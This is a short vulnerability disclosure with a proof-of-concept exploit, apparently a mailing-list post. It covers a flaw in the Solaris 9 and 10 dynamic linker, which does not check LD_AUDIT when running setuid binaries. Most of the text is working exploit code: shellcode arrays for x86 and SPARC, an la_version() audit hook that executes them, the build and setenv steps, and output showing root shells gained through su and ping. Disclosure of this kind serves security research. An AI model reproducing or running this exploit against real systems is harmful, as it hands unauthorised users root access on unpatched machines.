ldsoWhoops.txt

`ld.so from Solaris 9 and 10 doesn't check LD_AUDIT environment variable when  
running s[ug]id binaries, allowing to run arbitrary code with elevated  
privileges. Well, I can't belive, that such trivial vulnerability exists in  
modern OS...  
  
The following PoC code was tested on:  
  
- SunOS 5.10 Generic i86pc i386 i86pc  
- SunOS 5.9 Generic_112233-12 sun4u  
  
It does NOT work on:  
  
SunOS 5.8 Generic_117350-02 sun4u sparc  
  
Example on unpatched Solaris 10 (AMD64):  
  
atari:venglin:~> cat dupa.c  
static char sh[] =  
"\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff";  
  
int la_version() {  
void (*f)();  
f = (void*)sh;  
f();  
return 3;  
}  
atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c  
atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so  
atari:venglin:~> su  
# id  
uid=0(root) gid=10(staff)  
  
  
  
Solaris 9 on SPARC:  
  
$ cat dupa.c  
char sh[] =  
/* setuid() */  
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"  
/* execve() */  
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"  
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"  
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";  
  
int la_version() {  
void (*f)();  
f = (void*)sh;  
f();  
return 3;  
}  
  
$ gcc -fPIC -shared -o /tmp/dupa.so dupa.c  
$ export LD_AUDIT=/tmp/dupa.so  
$ ping  
# id  
uid=0(root) gid=100(student)  
  
--   
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *  
* JID: [email protected] ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *  
`